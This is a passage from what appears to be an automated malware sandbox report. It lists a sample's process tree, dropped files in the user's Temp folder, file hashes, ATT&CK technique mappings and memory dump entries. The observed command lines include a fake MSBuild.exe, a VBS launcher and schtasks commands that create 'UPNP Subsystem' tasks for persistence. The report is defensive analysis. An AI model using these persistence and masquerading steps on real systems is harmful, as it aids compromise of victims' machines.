- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3268

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 20
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3756

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Qzwrlzhuazpf.vbs"
5⤵
- Suspicious use of WriteProcessMemory
PID:3308

C:\Users\Admin\AppData\Local\Temp\Zmbvtlrendzxjyiwyialbskbee.exe
"C:\Users\Admin\AppData\Local\Temp\Zmbvtlrendzxjyiwyialbskbee.exe"
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1660

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 20
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3152

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "UPNP Subsystem" /xml "C:\Users\Admin\AppData\Local\Temp\tmp491B.tmp"
6⤵
- Creates scheduled task(s)
PID:784

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "UPNP Subsystem Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp4A25.tmp"
6⤵
- Creates scheduled task(s)
PID:1960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
66382a4ca6c4dcf75ce41417d44be93e

SHA1
8132cbef1c12f8a89a68a6153ade4286bf130812

SHA256
a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56

SHA512
2bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
5f640bd48e2547b4c1a7421f080f815f

SHA1
a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

SHA256
916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

SHA512
a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4b79347b2d36cfe7b006390252371a73

SHA1
bb14bae6234d826fc5902e3d059fc4abae820d7c

SHA256
285bccb6504cea88441969f29db90f4b399f191c89d834fadf77b92f70011535

SHA512
bf5f63ddf477bada17535ad5382e6062766447e1d0c25d0bb07de69e1ac62adb2330a63cacc3234c59b3336d20fec78c0ae25641e87b578a43ddaa12b7a2f138

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8708b2e6ecfbad3af21fa9a6f1b89548

SHA1
d003b232bff1cdbff8fc1fd8ffcb6c7ba91b1897

SHA256
3a4f46169a418638d4e4726b309d3588f13719e14e5c51125549f49a61a213b3

SHA512
1ef50f3e14e140137720daf192186b9fd296bf0f26c12cff113d84832b508ee9aef8dcef3197bfebda80df2d6dda5c3ce31a906031edf5c69d1df61481eba639

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
MD5
9af17c8393f0970ee5136bd3ffa27001

SHA1
4b285b72c1a11285a25f31f2597e090da6bbc049

SHA256
71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019

SHA512
b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
MD5
9af17c8393f0970ee5136bd3ffa27001

SHA1
4b285b72c1a11285a25f31f2597e090da6bbc049

SHA256
71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019

SHA512
b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Qzwrlzhuazpf.vbs
MD5
6affc56d3dd953bbc55eacc714c43ef5

SHA1
b9db4b576bd63d8e9cf6e9ab8a44a0e919dde203

SHA256
174e8c2817c39db97ef2dbcd861ba001dec361882f76160baeae76c981770033

SHA512
68cc3b3fd30796fc24cfb325725327cdbe6fe95d42e4de565c614f6d2322785f257c2e601f55c2dbec3664e9f4c7dd50c8374dcc6582e824f4cb32b56fe182e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zmbvtlrendzxjyiwyialbskbee.exe
MD5
15402b5a8dd17b645f9a4ac368c4bb52

SHA1
f4255f5a198e113278d9881eb27d20d2b45e4f4a

SHA256
20274bafeb32fa33aee7544a31e586221fb2f828d26c72d40c21b15146fec05d

SHA512
2d9853cbab2e0bb267c16012caf96bda4d8bcb987bda5ecda370e60468b761941a09cc6114e86906a155d0baf0041e24ffe31fc54a7686574eb8f55c4e4cb689

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zmbvtlrendzxjyiwyialbskbee.exe
MD5
15402b5a8dd17b645f9a4ac368c4bb52

SHA1
f4255f5a198e113278d9881eb27d20d2b45e4f4a

SHA256
20274bafeb32fa33aee7544a31e586221fb2f828d26c72d40c21b15146fec05d

SHA512
2d9853cbab2e0bb267c16012caf96bda4d8bcb987bda5ecda370e60468b761941a09cc6114e86906a155d0baf0041e24ffe31fc54a7686574eb8f55c4e4cb689

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp491B.tmp
MD5
90675db4a09b69cdd0bfd1c06831b8b7

SHA1
2002702690e6a83cd00b075c604b1a63d77d9dae

SHA256
869ae60819eb2318a360b5980b8331f6ca976973c4cb3fce25a2cc7364eb4474

SHA512
d52e8278e2890c77e1f5a11338fc32d066ab53e8bbd935a957d902af5d5e6ea34a3a7aea28a81433af84ad0ed46cf59cade8c3cb2b1d6a0cddf720ef5d0ea7a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4A25.tmp
MD5
af9986f5e128fd8bd3ae748fcba6576d

SHA1
8060072c35108b48649a03be91803b97f1ad40a4

SHA256
f3242f6480b3d1a8f9285135fdce9a201c4802ce062eee4fb41c488a21d53303

SHA512
f35c8e1699905bc972ae48a5a4a9fd33ea04b2d851ffc1cb1d1573a2087121d803b4186a696b2edad10a9c46c388a478e105f5a730020b598aa9f483086dba38

Download Submit
memory/664-123-0x00007FFACC8E0000-0x00007FFACE7D5000-memory.dmp

Filesize
31.0MB

Download
memory/664-477-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-478-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-479-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-480-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-115-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-116-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-117-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-114-0x00007FF7F88F0000-0x00007FF7FBEA6000-memory.dmp

Filesize
53.7MB

Download
memory/664-122-0x00007FFACE7E0000-0x00007FFACF8CE000-memory.dmp

Filesize
16.9MB

Download
memory/664-119-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-118-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/784-501-0x0000000000000000-mapping.dmp

Download
memory/1660-495-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/1660-517-0x0000000004A30000-0x0000000004F2E000-memory.dmp

Filesize
5.0MB

Download
memory/1660-502-0x0000000004E50000-0x0000000004E98000-memory.dmp

Filesize
288KB

Download
memory/1660-493-0x0000000000000000-mapping.dmp

Download
memory/1960-504-0x0000000000000000-mapping.dmp

Download
memory/2444-264-0x0000000000000000-mapping.dmp

Download
memory/2724-277-0x00000157CEA00000-0x00000157CEA01000-memory.dmp

Filesize
4KB

Download
memory/2724-350-0x00000157CE980000-0x00000157CE981000-memory.dmp

Filesize
4KB

Download
memory/2724-269-0x0000000000000000-mapping.dmp

Download
memory/2724-274-0x00000157CE7B0000-0x00000157CE7B1000-memory.dmp

Filesize
4KB

Download
memory/2724-282-0x00000157CE800000-0x00000157CE802000-memory.dmp

Filesize
8KB

Download
memory/2724-397-0x00000157CE806000-0x00000157CE808000-memory.dmp

Filesize
8KB

Download
memory/2724-398-0x00000157CE808000-0x00000157CE809000-memory.dmp

Filesize
4KB

Download
memory/2724-283-0x00000157CE803000-0x00000157CE805000-memory.dmp

Filesize
8KB

Download
memory/2724-389-0x00000157CEC80000-0x00000157CEC81000-memory.dmp

Filesize
4KB

Download
memory/3152-513-0x00000000059C0000-0x00000000059D9000-memory.dmp

Filesize
100KB

Download
memory/3152-491-0x0000000005700000-0x0000000005701000-memory.dmp

Filesize
4KB

Download
memory/3152-483-0x000000000041E792-mapping.dmp

Download
memory/3152-512-0x0000000005650000-0x0000000005655000-memory.dmp

Filesize
20KB

Download
memory/3152-482-0x0000000000400000-0x0000000000438000-memory.dmp

Filesize
224KB

Download
memory/3152-516-0x0000000005AB0000-0x0000000005AB3000-memory.dmp

Filesize
12KB

Download
memory/3152-515-0x00000000055C0000-0x0000000005ABE000-memory.dmp

Filesize
5.0MB

Download
memory/3268-427-0x0000000000440000-0x0000000000441000-memory.dmp

Filesize
4KB

Download
memory/3268-433-0x0000000007200000-0x00000000072CD000-memory.dmp

Filesize
820KB

Download
memory/3268-399-0x0000000000000000-mapping.dmp

Download
memory/3268-460-0x0000000007310000-0x00000000073A9000-memory.dmp

Filesize
612KB

Download
memory/3268-429-0x00000000053A0000-0x00000000053A1000-memory.dmp

Filesize
4KB

Download
memory/3268-430-0x0000000004DE0000-0x0000000004DE1000-memory.dmp

Filesize
4KB

Download
memory/3268-431-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

Filesize
4KB

Download
memory/3268-432-0x0000000004EA0000-0x000000000539E000-memory.dmp

Filesize
5.0MB

Download
memory/3308-481-0x0000000000000000-mapping.dmp

Download
memory/3756-446-0x0000000007960000-0x0000000007961000-memory.dmp

Filesize
4KB

Download
memory/3756-447-0x0000000007E70000-0x0000000007E71000-memory.dmp

Filesize
4KB

Download
memory/3756-442-0x00000000011C2000-0x00000000011C3000-memory.dmp

Filesize
4KB

Download
memory/3756-440-0x00000000011C0000-0x00000000011C1000-memory.dmp

Filesize
4KB

Download
memory/3756-441-0x0000000006B50000-0x0000000006B51000-memory.dmp

Filesize
4KB

Download
memory/3756-461-0x00000000011C3000-0x00000000011C4000-memory.dmp

Filesize
4KB

Download
memory/3756-439-0x0000000006AB0000-0x0000000006AB1000-memory.dmp

Filesize
4KB

Download
memory/3756-438-0x0000000006DB0000-0x0000000006DB1000-memory.dmp

Filesize
4KB

Download
memory/3756-437-0x0000000001050000-0x0000000001051000-memory.dmp

Filesize
4KB

Download
memory/3756-434-0x0000000000000000-mapping.dmp

Download
memory/3756-444-0x0000000007550000-0x0000000007551000-memory.dmp

Filesize
4KB

Download
memory/3756-443-0x00000000074E0000-0x00000000074E1000-memory.dmp

Filesize
4KB

Download
memory/3756-448-0x0000000007CB0000-0x0000000007CB1000-memory.dmp

Filesize
4KB

Download
memory/3756-453-0x00000000091D0000-0x00000000091D1000-memory.dmp

Filesize
4KB

Download
memory/3756-454-0x0000000008970000-0x0000000008971000-memory.dmp

Filesize
4KB

Download
memory/3980-518-0x00000000071A0000-0x00000000071A1000-memory.dmp

Filesize
4KB

Download
memory/3980-522-0x0000000007E10000-0x0000000007E11000-memory.dmp

Filesize
4KB

Download
memory/3980-520-0x00000000071A2000-0x00000000071A3000-memory.dmp

Filesize
4KB

Download
memory/3980-525-0x00000000087C0000-0x00000000087C1000-memory.dmp

Filesize
4KB

Download
memory/3980-505-0x0000000000000000-mapping.dmp

Download
memory/3980-553-0x00000000071A3000-0x00000000071A4000-memory.dmp

Filesize
4KB

Download